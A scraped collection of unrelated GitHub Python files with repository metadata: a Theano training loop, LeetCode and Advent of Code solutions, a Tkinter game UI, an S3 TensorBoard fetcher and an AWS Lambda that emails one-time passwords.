            start = datetime.now()
            status = super(MyBatchOptimizer, self).iter_update(epoch,
                                                               nb_batches,
                                                               iter_update_batch)
            duration = (datetime.now() - start).total_seconds()
            status["duration"] = duration
            acc = evaluate(X_train, y_train, batch_size=self.batch_size_eval)
            status["accuracy_train"] = acc
            status["accuracy_train_std"] = 0
            acc = evaluate(X_valid, y_valid, batch_size=self.batch_size_eval)
            status["accuracy_valid"] = acc
            status["accuracy_valid_std"] = 0
            status["error_valid"] = 1 - status["accuracy_valid"]
            status = self.add_moving_avg("accuracy_train", status)
            status = self.add_moving_var("accuracy_train", status)
            status = self.add_moving_avg("accuracy_valid", status)
            status = self.add_moving_var("accuracy_valid", status)
            # Append every stat to the job record (one list per key).
            for k, v in status.items():
                if k not in job_content:
                    job_content[k] = [v]
                else:
                    job_content[k].append(v)
            # Learning-rate schedule (shared Theano variable `lr`).
            lr = self.learning_rate
            lr_decay_method = hp["learning_rate_decay_method"]
            lr_decay = hp["learning_rate_decay"]
            cur_lr = lr.get_value()
            t = status["epoch"]
            if lr_decay_method == "exp":
                new_lr = cur_lr * (1 - lr_decay)
            elif lr_decay_method == "lin":
                new_lr = initial_lr / (1 + t)
            elif lr_decay_method == "sqrt":
                new_lr = initial_lr / np.sqrt(1 + t)
            elif lr_decay_method == 'discrete':
                # Divide the LR when validation accuracy plateaus
                # (its moving variance drops below epsilon).
                eps = hp["discrete_learning_rate_epsilon"]
                div = hp["discrete_learning_divide"]
                if status["moving_var_accuracy_valid"] <= eps:
                    new_lr = cur_lr / div
                else:
                    new_lr = cur_lr
            else:
                new_lr = cur_lr
            new_lr = np.array(new_lr, dtype="float32")
            lr.set_value(new_lr)
            if 'learning_rate_per_epoch' not in job_content:
                job_content['learning_rate_per_epoch'] = []
            job_content['learning_rate_per_epoch'].append(float(self.learning_rate.get_value()))
            return status
        def add_moving_avg(self, name, status, B=0.9):
            """Exponential moving average of status[name] with decay B."""
            if len(self.stats) >= 2:
                old_avg = self.stats[-2]["moving_avg_" + name]
            else:
                old_avg = 0
            avg = B * old_avg + (1 - B) * status[name]
            status["moving_avg_" + name] = avg
            return status
        def add_moving_var(self, name, status, B=0.9):
            """Exponential moving variance estimate of status[name]."""
            if len(self.stats) >= 2:
                old_avg = self.stats[-2]["moving_avg_" + name]
                old_var = self.stats[-2]["moving_var_" + name]
            else:
                old_avg = 0
                old_var = 0
            new_avg = B * old_avg + (1 - B) * status[name]
            var = B * old_var + (1 - B) * (status[name] - old_avg) * (status[name] - new_avg)
            status["moving_var_" + name] = var
            return status
learning_rate = theano.shared(np.array(hp["learning_rate"],
dtype="float32"))
momentum = hp["momentum"]
optim_params = {"learning_rate": learning_rate}
if "momentum" in hp["optimization"]:
optim_params["momentum"] = hp["momentum"]
batch_optimizer = MyBatchOptimizer(
verbose=1, max_nb_epochs=hp["max_epochs"],
batch_size=hp["batch_size"],
optimization_procedure=(getattr(updates, hp["optimization"]),
optim_params),
patience_stat="error_valid",
patience_nb_epochs=hp["patience_nb_epochs"],
patience_progression_rate_threshold=hp["patience_threshold"],
patience_check_each=hp["patience_check_each"],
verbose_stat_show=[
"epoch",
"duration",
"accuracy_train",
"accuracy_train_std",
"accuracy_valid",
"accuracy_valid_std",
]
)
batch_size_eval = 1024
job_content['batch_size_eval'] = batch_size_eval
batch_optimizer.learning_rate = learning_rate
batch_optimizer.batch_size_eval = batch_size_eval
input_variables = OrderedDict()
input_variables["X"] = dict(tensor_type=T.tensor4)
input_variables["y"] = dict(tensor_type=T.ivector)
functions = dict(
predict=dict(
get_output=lambda model, X: (model.get_output(X, deterministic=True)[0]).argmax(axis=1),
params=["X"]
)
)
    def loss_function(model, tensors):
        """Mean categorical cross-entropy plus optional weight penalties
        (hp['weight_decay'] is applied as L1, hp['l2_decay'] as L2)."""
        X = tensors["X"]
        y = tensors["y"]
        y_hat, = model.get_output(X)
        if hp["weight_decay"] > 0:
            l1 = sum(T.abs_(param).sum() for param in model.capsule.all_params_regularizable) * hp["weight_decay"]
        else:
            l1 = 0
        if hp["l2_decay"] > 0:
            l2 = sum(T.sqr(param).sum() for param in model.capsule.all_params_regularizable) * hp["l2_decay"]
        else:
            l2 = 0
        return T.nnet.categorical_crossentropy(y_hat, y).mean() + l1 + l2
batch_iterator = MyBatchIterator(hp["nb_data_augmentation"],
zoom_range=hp["zoom_range"],
rotation_range=hp["rotation_range"],
shear_range=hp["shear_range"],
translation_range=hp["translation_range"],
do_flip=hp["do_flip"])
nnet = Capsule(
input_variables, model,
loss_function,
functions=functions,
batch_optimizer=batch_optimizer,
batch_iterator=batch_iterator,
)
from sklearn.preprocessing import LabelEncoder
imshape = ([data.X.shape[0]] +
list(data.img_dim))
X = data.X.reshape(imshape).astype(np.float32)
y = data.y
label_encoder = LabelEncoder()
y = label_encoder.fit_transform(y)
y = y.astype(np.int32)
X, y = shuffle(X, y)
if fast_test is True:
X = X[0:100]
y = y[0:100]
X_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=hp["valid_ratio"])
# rescaling to [-1, 1]
X_min = X_train.min(axis=(0, 2, 3))[None, :, None, None]
X_max = X_train.max(axis=(0, 2, 3))[None, :, None, None]
    def preprocess(a):
        # Rescale raw pixel values from [0, 255] to [-1, 1].
        return (a / 255.) * 2 - 1
X_train = preprocess(X_train)
X_valid = preprocess(X_valid)
job_content['nb_examples_train'] = X_train.shape[0]
job_content['nb_examples_valid'] = X_valid.shape[0]
try:
nnet.fit(X=X_train, y=y_train)
except KeyboardInterrupt:
print("interruption...")
imshape = ([data_test.X.shape[0]] +
list(data_test.img_dim))
X_test = data_test.X.reshape(imshape).astype(np.float32)
X_test = preprocess(X_test)
y_test = data_test.y
y_test = label_encoder.transform(y_test)
y_test = y_test.astype(np.int32)
acc = evaluate(X_test, y_test, batch_size_eval)
job_content['accuracy_test'] = acc
job_content['accuracy_test_std'] = 0
print("Test accuracy : {}+-{}".format(acc, 0))
if fast_test is False:
db.add_job(job_content)
| mehdidc/zoo | train.py | train.py | py | 14,630 | python | en | code | 0 | github-code | 90 |
13454650838 | # https://leetcode.com/problems/kth-smallest-element-in-a-bst/
from typing import Optional, List
# Definition for a binary tree node.
class TreeNode:
    """Minimal binary-tree node: a value plus optional left/right children."""
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right
def bst_to_list(node: Optional[TreeNode], nums: List[int]) -> None:
    """In-order walk: append every value under *node* to *nums* (ascending for a BST)."""
    stack = []
    cur = node
    while stack or cur is not None:
        while cur is not None:
            stack.append(cur)
            cur = cur.left
        cur = stack.pop()
        nums.append(cur.val)
        cur = cur.right
class Solution:
    def kthSmallest(self, root: Optional[TreeNode], k: int) -> int:
        """Return the k-th smallest value (1-indexed) stored in the BST.

        Same contract as before, but the in-order values are gathered with
        an explicit stack instead of delegating to the module-level
        bst_to_list helper.
        """
        ordered = []
        stack = []
        node = root
        while stack or node is not None:
            while node is not None:
                stack.append(node)
                node = node.left
            node = stack.pop()
            ordered.append(node.val)
            node = node.right
        return ordered[k-1]
| petercrackthecode/LeetcodePractice | kth_smallest_element_in_bst/my_solution.py | my_solution.py | py | 640 | python | en | code | 1 | github-code | 90 |
43032629147 | t = int(input())
def getLongestSubsequence(lcs_matrix,str1,str2,x,y):
revseq = ""
while (x>0) and (y>0):
if str1[x-1] != str2[y-1]:
if lcs_matrix[x-1][y] == lcs_matrix[x][y]: x -= 1
elif lcs_matrix[x][y-1] == lcs_matrix[x][y]: y -= 1
else:
revseq += str1[x-1]
x -= 1
y -= 1
return revseq[::-1]
while t:
x, y = map(int, input().split(" "))
first = input()
second = input()
t -= 1
lcs = [[0] * (y + 1) for _ in range(x + 1)]
for i in range(x + 1):
for j in range(y + 1):
if (not i) or (not j):
None
elif first[i - 1] == second[j - 1]:
lcs[i][j] = lcs[i - 1][j - 1] + 1
else:
lcs[i][j] = max(lcs[i - 1][j], lcs[i][j - 1])
print("Longets Common SubSequence length: ",lcs[x][y])
print("Longets Common SubSequence: ",getLongestSubsequence(lcs,first,second,x,y)) | kaustav1808/Data-Structure-And-Algorithm-Implementation | Dynamic Programming/longestCommonSubSequence.py | longestCommonSubSequence.py | py | 972 | python | en | code | 0 | github-code | 90 |
5544444752 | import sys
from collections import deque
si = sys.stdin.readline
N, P = map(int, si().split())
def bfs():
q = deque()
q.append(N)
visited = [0 for _ in range(1000000 + 1)]
visited[N] += 1 # 방문처리
while q:
val = q.popleft()
val = str(val)
if val == 3:
break
number_list_str = list(val)
new_val = 0
for number_str in number_list_str:
new_val = new_val + pow(int(number_str), P)
if visited[new_val] <= 2:
q.append(new_val)
visited[new_val] += 1
print(visited.count(1))
return
bfs() | SteadyKim/Algorism | language_PYTHON/백준/BJ2331.py | BJ2331.py | py | 635 | python | en | code | 0 | github-code | 90 |
33153442746 | import streamlit as st
import numpy as np
import pandas as pd
import plotly.express as px
def run():
st.markdown("# How does data become a line?")
st.markdown("""
Alice measured the rate of reaction for the decomposition of hydrogen peroxide
at several temperatures. What should she plot to get a line?
""")
T_celsius = np.array([0, 20, 40, 60, 80])
T_kelvin = T_celsius + 273.15
A = 2.432e5 # Exponential prefactor
Ea = 68.9e3 # Activation energy
R = 8.3145 # Ideal gas constant
np.random.seed(239049034)
k = A * np.exp(-Ea/(R*T_kelvin)) * (1+np.random.randn(5)*0.15)
ln_k = np.log(k)
T_inverse = 1/T_kelvin
log_T = np.log(T_kelvin)
df = pd.DataFrame.from_dict({"T (°C)": T_celsius, "k (s⁻¹)": k,
"ln(k/s⁻¹)": ln_k, "1/k (s)": 1/k,
"log(T/K)": log_T,
"1/T (K⁻¹)": T_inverse,
"T (K)": T_kelvin})
st.dataframe(df[["T (°C)", "k (s⁻¹)"]].style
.format("{:.2e}", subset="k (s⁻¹)")
.format("{:.1f}", subset="T (°C)"))
y_options = [x for x in df.columns if 'k' in x]
x_options = [x for x in df.columns if 'T' in x]
y_axis = st.selectbox("Y axis", y_options)
x_axis = st.selectbox("X axis", x_options)
fig = px.scatter(df, x=x_axis, y=y_axis, trendline='ols')
results = px.get_trendline_results(fig)
results = results.px_fit_results[0]
b, m = results.params
R_squared = results.rsquared
st.write(f"""Trendline
y = {m:.2f}x + {b:.2f}
R² = {R_squared:.4f}
""")
st.plotly_chart(fig)
st.markdown("""
### Questions
1. What is the activation energy for the reaction in kJ/mol?
""")
correct_Ea = 8196.29*8.3145 / 1000
Ea_response = st.number_input("Activation energy (kJ/mol)", value=0.0)
if Ea_response != 0.0 and abs(Ea_response-correct_Ea) > 0.2:
st.write("Incorrect. Try again.")
elif abs(Ea_response-correct_Ea) < 0.2:
st.write("Correct!")
st.markdown("2. What is the pre-exponential factor?")
A_response = st.number_input("Pre-exponential factor:", value=0.0, format="%2e")
correct_A = np.exp(12.07)
if A_response != 0.0 and abs(A_response-correct_A) > 1e4:
st.write("Incorrect. Try again.")
elif abs(A_response-correct_A) < 0.2e4:
st.write("Correct!")
# Page entry point when executed directly (`streamlit run arrhen.py`).
if __name__ == '__main__':
    run()
74543542695 | import json
import boto3
import json
import boto3
import random
import string
import datetime
from custom_encoder import CustomEncoder, error_response
# Created at import time so AWS Lambda re-uses the clients across warm invocations.
email_client = boto3.client("ses")
dynamo_client = boto3.resource(service_name='dynamodb', region_name='us-east-1')
product_table_email = dynamo_client.Table('email_otp')  # one pending OTP row per e-mail address
def lambda_handler(event, context):
    """E-mail OTP Lambda: sends or verifies one-time passwords.

    event fields:
        otpstate -- 'SENDOTP' / 'RESEND' to generate and mail a new code,
                    'VERIFY' to compare event['otp'] with the stored code.
        emailid  -- recipient address; also the DynamoDB partition key.
        otp      -- user-supplied code (VERIFY only).

    Returns a 200 envelope whose body carries a status message; unexpected
    exceptions are delegated to error_response().
    """
    try:
        print("requestBody-", event)
        otp_state = event.get('otpstate')
        emailid = event.get('emailid')
        # Fallback message. Previously `response` was left unbound on the
        # no-match paths (unknown state, missing emailid, unknown address),
        # and the resulting NameError was silently swallowed by the except.
        response = "INVALID REQUEST"
        if otp_state == 'SENDOTP' or otp_state == 'RESEND':
            randnum = random.randint(100000, 999999)  # 6-digit OTP
            subject = "OTP VERIFICATION"
            if emailid:
                body = """<div style="font-family: Helvetica,Arial,sans-serif;min-width:1000px;overflow:auto;line-height:2">
  <div style="margin:50px auto;width:70%;padding:20px 0">
    <div style="border-bottom:1px solid #eee">
      <a href="" style="font-size:1.4em;color: #00466a;text-decoration:none;font-weight:600">INTELLILANG</a>
    </div>
    <p style="font-size:1.1em">Hi,</p>
    <p>Thank you for choosing INTELLILANG. Use the following OTP to complete your Sign Up procedures. OTP is valid for 5 minutes</p>
    <h2 style="background: #00466a;margin: 0 auto;width: max-content;padding: 0 10px;color: #fff;border-radius: 4px;">{0}</h2>
    <p style="font-size:0.9em;">Regards,<br />INTELLILANG</p>
    <hr style="border:none;border-top:1px solid #eee" />
    <div style="float:right;padding:8px 0;color:#aaa;font-size:0.8em;line-height:1;font-weight:300">
      <p>INTELLILANG</p>
    </div>
  </div>
</div>
""".format(randnum)
                # Persist the OTP first, then mail it.
                # NOTE(review): the mail promises 5-minute validity but no
                # timestamp/TTL is stored here -- confirm expiry is enforced.
                product_table_email.put_item(Item={'email_id': emailid, 'otp': randnum})
                message_email = {"Subject": {"Data": subject}, "Body": {"Html": {"Data": body}}}
                # NOTE(review): hard-coded sender address; consider an env var.
                email_client.send_email(Source="saisurajch123@gmail.com", Destination={"ToAddresses": [emailid]},
                                        Message=message_email)
                print(randnum)
                response = "OTP SENT SUCCESSFULLY"
        elif otp_state == 'VERIFY':
            otp_verify = event['otp']
            dbresponce = product_table_email.get_item(Key={'email_id': emailid})
            print("dbresponce", dbresponce)
            if "Item" in dbresponce:
                otp = dbresponce["Item"]["otp"]
                print(otp)
                # Compare as strings: DynamoDB returns numbers as Decimal.
                if str(otp) == str(otp_verify):
                    # NOTE(review): misspelling kept on purpose -- clients may
                    # match on this exact string.
                    response = "verified succesfully"
                else:
                    response = "OTP invalid"
        return {
            'statusCode': 200,
            'body': {"message": response},
            'headers': {
                'Content-Type': 'application/json',
                'Access-Control-Allow-Origin': '*'
            }
        }
    except Exception as e:
        print(e)
        return error_response(e)
| NovoSphere/Login-Sigup-with-React-and-AWS | AWS/email.py | email.py | py | 3,197 | python | en | code | 0 | github-code | 90 |
9301503264 | import datetime
import logging
import os
import urllib.parse
from typing import Any, Dict, Generator, List, Tuple
from .base import Fetcher
logger = logging.getLogger(__name__)
class S3Fetcher(Fetcher):
def __init__(
self, storage_config: Dict[str, Any], storage_paths: List[str], local_dir: str
) -> None:
import boto3
from determined.common.storage import boto3_credential_manager
boto3_credential_manager.initialize_boto3_credential_providers()
self.s3 = boto3.resource(
"s3",
endpoint_url=storage_config.get("endpoint_url"),
aws_access_key_id=storage_config.get("access_key"),
aws_secret_access_key=storage_config.get("secret_key"),
)
self.client = self.s3.meta.client
self.bucket_name = str(storage_config["bucket"])
self.local_dir = local_dir
self.storage_paths = storage_paths
self._file_records = {} # type: Dict[str, datetime.datetime]
def _find_keys(self, prefix: str) -> Generator[Tuple[str, datetime.datetime], None, None]:
logger.debug(f"Listing keys in bucket '{self.bucket_name}' with prefix '{prefix}'")
prefix = urllib.parse.urlparse(prefix).path.lstrip("/")
paginator = self.client.get_paginator("list_objects_v2")
page_iterator = paginator.paginate(Bucket=self.bucket_name, Prefix=prefix)
page_count = 0
for page in page_iterator:
page_count += 1
for s3_obj in page.get("Contents", []):
yield (s3_obj["Key"], s3_obj["LastModified"])
if page_count > 1:
logger.info(f"Fetched {page_count} number of list_objects_v2 pages")
def fetch_new(self) -> int:
"""Fetches changes files found in storage paths to local disk."""
new_files = []
# Look at all files in our storage location.
for storage_path in self.storage_paths:
for filepath, mtime in self._find_keys(storage_path):
prev_mtime = self._file_records.get(filepath)
if prev_mtime is not None and prev_mtime >= mtime:
continue
new_files.append(filepath)
self._file_records[filepath] = mtime
# Download the new or updated files.
for filepath in new_files:
local_path = os.path.join(self.local_dir, self.bucket_name, filepath)
dir_path = os.path.dirname(local_path)
os.makedirs(dir_path, exist_ok=True)
with open(local_path, "wb") as local_file:
self.client.download_fileobj(self.bucket_name, filepath, local_file)
logger.debug(f"Downloaded file to local: {local_path}")
return len(new_files)
| JorgedDiego/determined-ai | harness/determined/tensorboard/fetchers/s3.py | s3.py | py | 2,764 | python | en | code | 0 | github-code | 90 |
16404050149 | if __name__ == '__main__':
test_cnt = int(input())
for t in range(test_cnt):
digits = [int(digit) for digit in input()]
length = len(digits)
queue = []
if length%2 == 0:
queue.append((0,length-1))
else:
queue.append((0,length-2))
queue.append((1,length-1))
result = 0
while result == 0 and len(queue) != 0:
r = queue.pop(0)
if(r[0]>=r[1]):
continue
mid = int((r[0]+r[1])/2)
left = sum(digits[r[0]:mid+1])
right = sum(digits[mid+1:r[1]+1])
if sum(digits[r[0]:mid+1]) == sum(digits[mid+1:r[1]+1]):
result = r[1] - r[0] + 1
else:
if((r[0]+1,r[1]-1) not in queue):
queue.append((r[0]+1,r[1]-1))
if((r[0]+2,r[1]) not in queue):
queue.append((r[0]+2,r[1]))
if((r[0],r[1]-2) not in queue):
queue.append((r[0],r[1]-2))
print(result) | HacoK/SolutionsOJ | 3-11/solution.py | solution.py | py | 1,056 | python | en | code | 3 | github-code | 90 |
13859571082 | import collections
import operator
def getDistance(startX, endX, startY, endY, points=None):
    """Classify every cell of the rectangle [startX..endX] x [startY..endY].

    For each cell, find the input point with the smallest Manhattan
    distance; the cell maps to that point's key, or to '.' when two or
    more points tie for closest.

    `points` is new and optional: it defaults to the module-level `coords`
    dict, so existing 4-argument callers behave as before. (Keys in this
    file are the sequential ints 0..n-1, which is what the original
    position-based lookup returned.)
    """
    if points is None:
        points = coords  # backward-compatible fall-back to the global table
    closest = {}
    for i in range(startX, endX + 1):
        for j in range(startY, endY + 1):
            best = None
            best_owner = None
            tied = False
            # Single pass per cell instead of materialising every distance
            # list and re-scanning it with Counter/min/index.
            for owner, (px, py) in points.items():
                d = abs(px - i) + abs(py - j)
                if best is None or d < best:
                    best, best_owner, tied = d, owner, False
                elif d == best:
                    tied = True
            closest[(i, j)] = '.' if tied else best_owner
    return closest
# Part 1: read the input points, then label every grid cell with its
# closest point (AoC 2018 day 6).
import sys  # was missing: the sys.exit() call below raised NameError

t1 = []
t2 = []
coords = {}
# Get coordinates in right format, as well as the range.
with open('6.txt') as f:
    count = 0
    for row in f:
        l1 = row.rstrip().replace(' ', '').split(',')
        # Store ints: max() over the original string lists compared
        # lexicographically (e.g. "9" > "100") and picked a wrong bound.
        t1.append(int(l1[0]))
        t2.append(int(l1[1]))
        coords[count] = (int(l1[0]), int(l1[1]))
        count += 1
startX = 0
startY = 0
endX = max(t1)
endY = max(t2)
print("MaxX:", endX, "MaxY", endY)
print('-' * 10)
d2 = getDistance(startX, endX, startY, endY)
print(d2.keys())
sys.exit(0)
# NOTE(review): everything below is unreachable -- the script calls
# sys.exit(0) above. Kept verbatim as work-in-progress for a
# grid-expansion approach to detecting infinite regions.
#Start with the column immediately to the right of endX. Once you're done calculating compare it with the values you already have for (endX, y)
match = 1
while match == 1:
    newstartX = endX + 1
    newendX = newstartX
    newstartY = 0
    newendY = endY
    t2 = getDistance(newstartX, newendX, newstartY, newendY)
    newrc = False
    for y in range(0, endY+1):
        if d2[(endX, y)] == t2[(newstartX, y)]:
            #print("Match: ", (endX, y), d2[(endX,y)], t2[(newstartX, y)])
            match = 0
        else:
            #print("No match:", d2[(endX,y)], t2[(newstartX, y)])
            #endX = newendX
            match = 1
            newrc = True
        #Update dictionary by adding new column
        d2[(newstartX, y)] = t2[(newstartX, y)]
    if newrc:
        endX = newendX
#Next go to the left most column where x becomes -ve. Once you're done here, compare it with what you have for (startX, y)
match = 1
while match == 1:
    newstartX = startX - 1
    newendX = newstartX
    newstartY = 0
    newendY = endY
    t2 = getDistance(newstartX, newendX, newstartY, newendY)
    newrc = False
    for y in range(0, endY+1):
        if d2[(startX, y)] == t2[(newstartX, y)]:
            #print("Match: ", d2[(startX,y)], t2[(newstartX, y)])
            match = 0
        else:
            #endX = newendX
            match = 1
            newrc = True
        #Update dictionary by adding new column
        d2[(newstartX, y)] = t2[(newstartX, y)]
    if newrc:
        endX = newendX
#Now go to the bottom most row where y becomes +ve. Once you're done here, compare it with what you have for (x, endY)
match = 1
while match == 1:
    newstartX = 0
    newendX = endX
    newstartY = endY + 1
    newendY = newstartY
    t2 = getDistance(newstartX, newendX, newstartY, newendY)
    newrc = False
    for x in range(0, endX+1):
        if d2[(x, endY)] == t2[(x, newendY)]:
            #print("Match: ", d2[(endX,y)], t2[(newstartX, y)])
            match = 0
        else:
            #endY = newendY
            match = 1
            newrc = True
        #Update dictionary by adding new column
        d2[(x, newstartY)] = t2[(x, newstartY)]
    if newrc:
        endY = newendY
#Now go to the top most row where y becomes -ve. Once you're done here, compare it with what you have for (x, startY)
match = 1
while match == 1:
    newstartX = 0
    newendX = endX
    newstartY = startY - 1
    newendY = newstartY
    newrc = False
    t2 = getDistance(newstartX, newendX, newstartY, newendY)
    for x in range(0, endX+1):
        if d2[(x, startY)] == t2[(x, newstartY)]:
            #print("Match: ", d2[(endX,y)], t2[(newstartX, y)])
            match = 0
        else:
            match = 1
            newrc = True
        #Update dictionary by adding new column
        d2[(x, newstartY)] = t2[(x, newstartY)]
    if newrc:
        endY = newendY
# Track infinites by looking at the border coordinates
final = {}
infinite = []
for k,v in d2.items():
    print(k,v)
    if v != '.':
        if k[0] == 0 or k[0] == endX or k[1] == 0 or k[1] == endY:
            if v not in infinite:
                infinite.append(v)
        if v not in final.keys():
            final[v] = 1
        else:
            final[v] += 1
#print('-' * 10)
#print("Infinite", infinite)
#print('-' * 10)
#for k,v in final.items():
#    print(k, v)
#print('-' * 10)
count= sorted(final.items(), reverse=True, key=operator.itemgetter(1))
for entry in count:
    #print(entry)
    if entry[0] not in infinite:
        print(entry[1])
        break
    else:
        continue
| arvinddoraiswamy/blahblah | adventofcode/2018/6.py | 6.py | py | 4,971 | python | en | code | 6 | github-code | 90 |
73114691495 | import tkinter as tk
import tkinter.font as tkFont
class UiManager:
    """Tkinter UI for the 'Gauntlets and Goblins' game window.

    Builds a scrollable transcript area, a multi-line input field with a
    Submit button, and optional per-character buttons. User entries are
    forwarded to `handle_entry_logic_callback`.
    """
    def __init__(self, window, handle_entry_logic_callback):
        self.handle_entry_logic_callback = handle_entry_logic_callback
        print(f"Debug: handle_entry_logic_callback is {self.handle_entry_logic_callback}")
        self.window = window
        # Call the function to get the values
        self.custom_font, self.bg_color, self.fg_color = self.define_custom_font_and_colors()
        # Load the startup graphic
        self.startup_image = tk.PhotoImage(file="art/ggTitle.png")
        # Create the label and place the image
        self.startup_label = tk.Label(window, image=self.startup_image)
        self.startup_label.place(x=0, y=0, relwidth=1, relheight=1)  # Cover the whole window
        # Set a minimum window size (width x height)
        window.minsize(800, 600)
        # Set background color
        window.configure(bg=self.bg_color)
        # Create a frame to hold the text area and the scrollbar
        self.text_frame = tk.Frame(window, bg=self.bg_color)
        self.text_frame.grid(column=0, row=0, padx=10, pady=10, sticky='nsew')
        # Create a scrollable text display area
        self.text_area = tk.Text(self.text_frame, wrap=tk.WORD, bg=self.bg_color, fg=self.fg_color, font=self.custom_font)
        self.text_area.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
        # Create a scrollbar and attach it to text_area
        self.scrollbar = tk.Scrollbar(self.text_frame, command=self.text_area.yview, bg=self.bg_color)
        self.scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
        # Create a multi-line text input field
        self.input_field = tk.Text(self.window, wrap=tk.WORD, width=100, height=4, bg=self.bg_color, fg=self.fg_color, font=self.custom_font)
        self.input_field.grid(column=0, row=1, padx=10, pady=10, sticky='w')
        # Bind the Enter key to handle_entry method
        self.input_field.bind("<Return>", lambda event, self=self: self.handle_entry(event, self.handle_entry_logic_callback))
        # Create a Submit button
        self.submit_button = tk.Button(window, text="Submit", command=lambda: self.handle_entry(None, self.handle_entry_logic_callback), bg=self.bg_color, fg=self.fg_color, font=self.custom_font)
        self.submit_button.grid(column=0, row=2, padx=10, pady=10, sticky='w')
        # Define text tags for coloring.
        self.text_area.tag_config('player_tag', foreground='green')
        self.text_area.tag_config('dm_tag', foreground='yellow')
        # BUG FIX: the option was misspelled 'foregroun', which makes
        # tag_config raise TclError and abort construction.
        self.text_area.tag_config('sys_tag', foreground='orange')
    # Define custom font and colors
    def define_custom_font_and_colors(self):
        """Return the (font, background color, foreground color) theme triple."""
        custom_font = tkFont.Font(family="Helvetica", size=12)
        bg_color = '#2E2E2E'
        fg_color = '#FFFFFF'
        return custom_font, bg_color, fg_color
    def initialize_window(self, width, height):
        """Size and title the top-level window."""
        self.window.geometry(f"{width}x{height}")
        self.window.minsize(800, 600)
        self.window.title("Gauntlets and Goblins")
    def display_text(self, text, tag=None):
        """Append `text` to the transcript, optionally colored by `tag`."""
        if tag:
            self.text_area.insert(tk.END, text, tag)
        else:
            self.text_area.insert(tk.END, text)
    def handle_entry(self, event, callback):
        """Read and clear the input field, then pass the text to `callback`."""
        print("handle_entry is called")  # Debugging line
        print(f"Event Info: {event}")  # Debugging line
        user_text = self.input_field.get("1.0", tk.END).strip()
        print(f"User Text: {user_text}")  # Debugging line
        self.input_field.delete("1.0", tk.END)
        callback(user_text)
    def add_character_buttons(self, num_buttons, callback):
        """Create one button per character; each calls `callback(index)`."""
        for i in range(num_buttons):
            # `i=i` binds the loop value at definition time (late-binding fix).
            button = tk.Button(self.window, text=f"P {i + 1}", command=lambda i=i: callback(i), bg=self.bg_color, fg=self.fg_color, font=self.custom_font)
            button.grid(column=0, row=i + 3, padx=10, pady=10, sticky='w')
    def display_dm_message(self, message, tag='dm_tag'):
        """Append a GM-prefixed message to the transcript."""
        self.text_area.insert(tk.END, "GM: ", tag)
        self.text_area.insert(tk.END, f"{message}\n\n")
    def display_sys_message(self, message, tag='sys_tag'):
        """Append a System-prefixed message to the transcript."""
        self.text_area.insert(tk.END, "System: ", tag)
        self.text_area.insert(tk.END, f"{message}\n\n")
    def add_character_buttons_and_configure_grid(self, num_buttons, callback):
        """Add the character buttons and configure grid weights/sizes."""
        # Use the instance to create or open character sheets
        self.add_character_buttons(num_buttons, callback)
        # Set weight and minimum size for rows and columns
        self.window.grid_rowconfigure(0, weight=1, minsize=400)  # Text frame
        self.window.grid_rowconfigure(1, weight=0, minsize=100)  # Input field
        self.window.grid_rowconfigure(2, weight=0, minsize=50)  # Submit button
        # Set weight and minimum size for the rows containing the buttons
        for i in range(3, num_buttons + 3):  # Loop through the rows where buttons are placed
            self.window.grid_rowconfigure(i, weight=0, minsize=50)
        # Set weight for the column
        self.window.grid_columnconfigure(0, weight=1)
| ryancarolina/ai-dungeon-master | UiManager.py | UiManager.py | py | 5,126 | python | en | code | 0 | github-code | 90 |
29544035647 | # -*- coding: utf-8 -*-
# @Time : 2022/2/20 10:29
# @Author : 模拟卷
# @Github : https://github.com/monijuan
# @CSDN : https://blog.csdn.net/qq_34451909
# @File : 6014AC. 构造限制重复的字符串.py
# @Software: PyCharm
# ===================================
"""给你一个字符串 s 和一个整数 repeatLimit ,用 s 中的字符构造一个新字符串 repeatLimitedString ,使任何字母 连续 出现的次数都不超过 repeatLimit 次。你不必使用 s 中的全部字符。
返回 字典序最大的 repeatLimitedString 。
如果在字符串 a 和 b 不同的第一个位置,字符串 a 中的字母在字母表中出现时间比字符串 b 对应的字母晚,则认为字符串 a 比字符串 b 字典序更大 。如果字符串中前 min(a.length, b.length) 个字符都相同,那么较长的字符串字典序更大。
示例 1:
输入:s = "cczazcc", repeatLimit = 3
输出:"zzcccac"
解释:使用 s 中的所有字符来构造 repeatLimitedString "zzcccac"。
字母 'a' 连续出现至多 1 次。
字母 'c' 连续出现至多 3 次。
字母 'z' 连续出现至多 2 次。
因此,没有字母连续出现超过 repeatLimit 次,字符串是一个有效的 repeatLimitedString 。
该字符串是字典序最大的 repeatLimitedString ,所以返回 "zzcccac" 。
注意,尽管 "zzcccca" 字典序更大,但字母 'c' 连续出现超过 3 次,所以它不是一个有效的 repeatLimitedString 。
示例 2:
输入:s = "aababab", repeatLimit = 2
输出:"bbabaa"
解释:
使用 s 中的一些字符来构造 repeatLimitedString "bbabaa"。
字母 'a' 连续出现至多 2 次。
字母 'b' 连续出现至多 2 次。
因此,没有字母连续出现超过 repeatLimit 次,字符串是一个有效的 repeatLimitedString 。
该字符串是字典序最大的 repeatLimitedString ,所以返回 "bbabaa" 。
注意,尽管 "bbabaaa" 字典序更大,但字母 'a' 连续出现超过 2 次,所以它不是一个有效的 repeatLimitedString 。
提示:
1 <= repeatLimit <= s.length <= 105
s 由小写英文字母组成
"""
from leetcode_python.utils import *
class Solution:
def repeatLimitedString(self, s: str, repeatLimit: int) -> str:
res = ''
cnt = Counter(s)
# print(cnt)
cnt = [list(x) for x in sorted(cnt.items(),key=lambda x:x[0])]
cnt.reverse()
l = len(cnt)
i=0
while i<l:
c, n = cnt[i]
if n==0:
i+=1
elif n<=repeatLimit:
res+=n*c
i+=1
elif i<len(cnt):
j=i+1
while j<l and cnt[j][1]==0:j+=1
if j==l:break
res = res+ repeatLimit*c + cnt[j][0]
cnt[i][1]-=repeatLimit
cnt[j][1]-=1
if i<l and cnt[i][0]: res +=repeatLimit*cnt[i][0]
return res
def test(data_test):
    """Feed one prepared argument list to Solution.repeatLimitedString."""
    solver = Solution()
    args = data_test  # plain arguments (no list -> TreeNode conversion needed here)
    return solver.repeatLimitedString(*args)
def test_obj(data_test):
    """Replay a LeetCode 'design'-style transcript.

    data_test = [method names, argument lists]; entry 0 constructs
    Solution, each later pair is invoked in order. Returns the collected
    results, with None standing in for the constructor call.
    """
    names, arg_lists = data_test
    outputs = [None]
